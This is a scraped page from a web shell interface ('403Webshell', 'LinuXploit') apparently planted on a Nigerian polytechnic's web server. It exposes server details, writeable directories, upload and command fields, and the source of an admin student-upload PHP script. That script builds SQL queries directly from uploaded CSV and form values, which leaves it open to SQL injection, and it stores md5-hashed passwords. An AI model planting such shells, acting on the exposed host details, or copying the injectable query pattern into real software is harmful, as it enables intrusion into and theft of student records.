403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.131.125
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_main/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_main/ace_listConS_process.php
<?php
/**
 * Created by PhpStorm.
 * User: adisa
 * Date: 3/2/2016
 * Time: 3:18 PM
 */
include('headMain.php');

?>
    <script src="../SpryAssets/SpryMenuBar.js" type="text/javascript"></script>

    <script type="text/javascript" language="javascript" src="../js/jquery-1.7.1.js"></script>
    <script type="text/javascript" language="javascript" src="../js/scriptFileLong.js"></script>

    <div class="row">
        <div class="col-lg-1"></div>
        <div class="col-lg-10">
            <div class="panel panel-default">
                <div class="panel-heading">
                    Uploading Admitted Students
                </div>
                <div class="panel-body">

                    <div class="row">
                        <div class="col-lg-12">
                            <?php
                            if(isset($_POST["submit"]))
                            {
                                $file = $_FILES['file']['tmp_name'];
                                $handle = fopen($file, "r");
                                $c = 0;
                                $dup=0;
                                $real=0;
                                while(($filesop = fgetcsv($handle, 100000000, ",")) !== false)
                                {
                                    $level=$_POST['level'];
                                    $jambNo = $filesop[1];
                                    $fullName = $filesop[2];
                                    $dept = $filesop[3];
                                    $originalNo = $filesop[4];
                                    $fullName=str_replace("'","''",$fullName);

                                    if ($level==1){
                                        $mode='NFT';
                                        $formTypea='aceForm';
                                        $sql_jambNo=$db->query("select formNo from ace_stddata where jambNo='$jambNo'");
                                        $sql_jambNo_num=$sql_jambNo->rowCount();

                                        if ($sql_jambNo_num==1){
                                            $sql_jambNo_fetch=$sql_jambNo->fetch(PDO::FETCH_BOTH);
                                            $formNo=$sql_jambNo_fetch['formNo'];
                                        }else{
                                            $formNo=$jambNo;
                                        }
                                    }else if($level==8){
                                        $formNo = $filesop[1];
                                        $mode='DPT';
                                        $formTypea='dptForm';
                                    }else if($level==5){
                                        $formNo = $filesop[1];
                                        $mode="RPT";
                                        $formTypea='ptForm';
                                    }else if($level==3){
                                        $formNo = $filesop[1];
                                        $mode="HFT";
                                    }else if($level==10){
                                        $formNo = $filesop[1];
                                        $mode="PFT";
                                    }else if($level==11){
                                        $formNo = $filesop[1];
                                        $mode="HDPT";
                                    }

									
//$postScore = $filesop[18];
//                                    $sql_a=$db->query("select * from ace_admitted where jambNo='$originalNo' or sex='$originalNo' or formNo='$jambNo' or formNo='$jambNo'");
//                                    $sql_a=$db->query("select * from admitted where sex='$originalNo'");
//                                    $sql_a=$db->query("select * from ace_admitted where jambNo='$jambNo'");
//                                    $sql_a=$db->query("select * from realdata where jambNo='$jambNo'");
//                                    $sql_a_num=$sql_a->rowCount();
                                    $sql_a_num=0;
                                    if($sql_a_num>0){
                                        $sql_a_fetch = $sql_a->fetch(PDO::FETCH_BOTH);
                                        echo 'Previous Record :ID No: ' . $jambNo . '--> Names:' . $sql_a_fetch['names'] . '-->Department:' . $sql_a_fetch['course'] . '-->Batch:' . $sql_a_fetch['batch'] . '<br>';
                                        echo 'Current Record :ID No: ' . $jambNo . '--> Names:' . $fullName . '-->Department:' . $dept . '<br>';
                                        $dup=$dup+1;
                                        $sola=0;
                                        $sql=0;
                                    }else {
                                        // $sql=$db->query("INSERT INTO check_phoneno(`sn`,`formNo`)values('',$jambNo)");
//                                       echo $sola="INSERT INTO `fedpoly`.`admitted` (`sn`, `formNo`, `jambNo`, `names`, `course`, `levelID`, `mode`, `state`, `lga`, `address`, `email`, `gsm`, `sex`, `batch`, `acceptance`, `datepay`,`formStatus`) VALUES (NULL, '$formNo', '$jambNo', '$fullName', '$dept', '$level', '$mode', '0', '0', '0', '0',  '0', '0', '14', '0', CURRENT_TIMESTAMP,'0')";
                                   // echo  $sola="INSERT INTO `fedpoly`.`ace_admitted` (`sn`, `formNo`, `jambNo`, `names`, `course`, `levelID`, `mode`, `state`, `lga`, `address`, `email`, `gsm`, `sex`, `batch`, `acceptance`, `datepay`,`formStatus`) VALUES (NULL, '$formNo', '$jambNo', '$fullName', '$dept', '$level', '$mode', '0', '0', '0', '0',  '$gsm', '0', '4', '0', CURRENT_TIMESTAMP,'0')";
//										 $sola="INSERT INTO `fedpoly`.`ace_admitted` (`sn`, `formNo`, `jambNo`, `names`, `course`, `levelID`, `mode`, `state`, `lga`, `address`, `email`, `gsm`, `sex`, `batch`, `acceptance`, `datepay`,`formStatus`) VALUES (NULL, '$formNo', '$jambNo', '$fullName', '$dept', '$level', '$mode', '0', '0', '0', '0',  '0', '$originalNo', '9', '0', CURRENT_TIMESTAMP,'1')";
                                    // echo   $sola="INSERT INTO `fedpoly`.`realdata` (`sn`, `formNo`, `matNo`, `names`, `course`, `levelID`, `mode`, `usernamea`, `passworda`) VALUES (NULL, '$formNo', '$jambNo', '$fullName', '$dept', '$level', '$mode', '$matNo', '$matNo')";
										//die();
//                                        $sql = $db->query($sola);
//       die();
                                        $real = $real + 1;

                                        //=========================Conversion column Start
//
     $courseDept = $db->query("select sn from dept where dOption='$dept'");

        $courseDept_fetch = $courseDept->fetch(PDO::FETCH_BOTH);
        $dOption = $courseDept_fetch['sn'];

        $na = explode(' ', $fullName);
        $surName = $na[0];
        if (isset($na[2])) {
            $otherNames = $na[1] . ' ' . $na[2];
        }
        else{
            $otherNames=$na[1];
        }

        $pass2=md5($jambNo);
        $phoneNumber='';
        $eMail='';
        $transID=$jambNo;

            $formNo='';
   $saheed="INSERT INTO `fedpoly`.`ace_entrancetable` (`sn`, `surname`, `othernames`, `password`, `gsm`, `email`, `course`, `transID`,`formType`,`dept`)
 VALUES (NULL, '$surName', '$otherNames', '$pass2', '$originalNo', '$eMail', '$dOption', '$transID','$formTypea','$dOption')";
        $sql_a = $db->query($saheed);
//    die($dept);
//=======================================Conversion column End
                                    }
                                }
                                if($sql){
                                    echo $real. " Record imported successfully<br>";
                                    echo $dup. " Record(s) Duplicated Found";
                                }else{
                                    echo "Sorry! There is some problem.";
                                    echo $real. " Record imported successfully<br>";
                                    echo $dup. " Record(s) Duplicated Found";
                                    echo $sola;
                                }
                            }
                            ?>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

<?php
include('footMain.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit